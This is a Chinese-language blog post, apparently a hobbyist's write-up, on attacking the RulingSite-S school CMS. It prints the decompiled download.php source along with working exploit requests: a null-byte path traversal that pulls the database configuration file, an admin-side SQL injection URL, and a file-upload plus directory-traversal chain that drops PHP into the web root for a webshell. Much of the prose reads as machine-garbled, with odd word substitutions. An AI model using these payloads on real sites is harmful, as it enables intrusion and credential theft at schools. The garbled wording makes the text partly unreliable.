广西大学为数不少

广西大学为数不少

RulingSite-S是广东省学堂中使用比较宽泛的一套cms,功能很是强(chou)大(lou)。页面简洁,布局清晰,后台操作便捷,不难上手—-、

1.即兴文件下载

以此早已不出奇了,在乌云平台也有人报告过了。代码应用ionCube加密,类似于zend。(解密呢也是一对一费时,因为我不会友善写工具,所以采纳了网上流传的ionCube-decoder工具,那个工具须要专注的是只可以在英文版系统下解密。)

/download.php源码:
<!–?php
include(“init.inc.php”
);
get_referer( false );
if ( empty($_GET[‘filename’] ) ||
empty( $_GET[‘title’] ) || empty( $_GET[‘dir’] ) )
{
error_display( t_(“缺乏檔案下載參數” ) );
}
$file_name
=$_GET[‘filename’];
$file_download =uploadpath(
).”/”.$_GET[‘dir’].”/”.$file_name;
$file_extension
=get_file_extension( $file_name );
if (
strpos($_SERVER[‘HTTP_USER_AGENT’], “MSIE” ) )
{
$file_save =utf8tobig5(
$_GET[‘title’] ).”.”.$file_extension;
}
else
{
$file_save
=$_GET[‘title’].”.”.$file_extension;
}
$file_save =ereg_replace(
“[\\/:*?\”<>|]”, “_”, $file_save);
if ( $file_extension== “php”
)
{
exit( “Cannotbe used for
“.$file_extension.” files!
” );
}
$mimeType =get_file_mimetype(
$file_name );
if (
strpos($_SERVER[‘HTTP_USER_AGENT’], “MSIE 5” ) ||
strpos($_SERVER[‘HTTP_USER_AGENT’], “Opera 7” ) )
{
$mimeType
=”application/x-download”;
}
ob_end_clean( );
header( “Pragma:public”
);
header( “Expires:0” );
header(“Cache-Control:
must-revalidate, post-check=0, pre-check=0” );
header(“Cache-Control: public”
);
header(“Content-Description: File
Transfer” );
header(“Content-Type: “.$mimeType
);
header(“Content-Disposition:
attachment; filename=”.$file_save );
header(“Content-Transfer-Encoding:
binary” );
header(“Content-Length: “.filesize(
$file_download ) );
@readfile(@$file_download
);
?>

filename(文件名),dir(要下载的那些文件的目录),title(最后保存的文件名)几个参数均由get传入,且必备。并且还限制下载php文件

参数神马的从未有过进展中用的过滤,构造filename=index.php%00.txt&dir=../../&title=1即可下载index.php,

http://www.xxx.tw/img.php?img=config.php&dir=../conf/&width=100&height=75
/img.php?img=config.php&dir=../conf/&width=100&height=75

http://xxxxxx/download.php?filename=config.php%00.txt&dir=../conf/&title=config,网站配置文件,当然也少不了数据库配置信息。默认的PHPmyadmin一般都会有的,有了数据库,一般就可以拿到管理员账号密码,或者直接导出一句话木马了。

2.后台sql注入

        那个顺序前台对流入或者过滤了的,但是后台就一些都没有过滤。(不过这一个洞有毛用o(╯□╰)o)

http://xxxxxx/admin/archive.admin.php?action=edititem&editSn=33%27%20and%201=2%20union%20select%20user()%20%23

一般是向来不别的过滤的

3.后台getshell

       后台可以上传任意文件,不过

<FilesMatch“\.(php|pl|py|jsp|asp|htm|shtml|sh|cgi)$”>
ForceType text/plain
</FilesMatch>

上传目录的那么些本子都会分析为txt。(吐槽下过滤吧,php过滤了,php3,php4,php5在一定标准下也是可实施的,htm过滤了,html照样可以,既然shtml过滤了,为啥不附带把shtm也过滤了?====)

@fd指示说phtm,phtml。这么些是也是个科学的思绪,不过还要看httpd.conf有没有布置

只是我的人品平素是比较差的

不过存在任意文件上传就是高危的,(代码就不解密了,留着今后渐渐看)。

可上传的地点有无数,一个一个抓包,仔细察看之后,发现

在个人保管—个人档案管理的地点那里上传档案相比较好玩:

先是次上传时抓的包

POST /inc/pplugin/sharing/sharing.rev.php
HTTP/1.1
——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition:form-data;
name=”File_Title” —那是投机写的文本名

12q
——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition: form-data; name=”Filename”; filename=”1.php”
Content-Type: application/x-php

——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition: form-data; name=”Tag”

2222 —-那是自己写的竹签
——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition: form-data; name=”editPID”
—-那会仍然空的

——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition: form-data; name=”action”

additem
——WebKitFormBoundaryjfqKPbHvsd5yX37a
Content-Disposition: form-data; name=”Submit”

Submit
——WebKitFormBoundaryjfqKPbHvsd5yX37a–

,然后看看大家上传的文件地点

整合下就是,/files/users_sharing/7/22_28094971.php

下一场我们编辑下,再一次抓包

POST /inc/pplugin/sharing/sharing.rev.php
HTTP/1.1
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition:form-data;
name=”File_Title”

12q
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”Filename”; filename=”1.php”
Content-Type: application/x-php

<?php phpinfo();?>
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”Tag”

2222
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”action”

edititem
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”editPID”

7
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”editSn”

22
——WebKitFormBoundarywfqTRwUrBIfuRIBG
Content-Disposition: form-data; name=”Submit”

Submit
——WebKitFormBoundarywfqTRwUrBIfuRIBG–

看到editPIDgin了吗?
/files/users_sharing/7/22_28094971.php,那是我们前边上传的得到路径,现在吧editPID改为7/../../../等于就是跳转到网站的根目录下,上传看看!

走访下看看,

成功~
其一getshell呢,是会员中央的村办保管面板,也可以说是前台getshell了。

自己认可自己相比水~第五次写文章,望见谅

admin

网站地图xml地图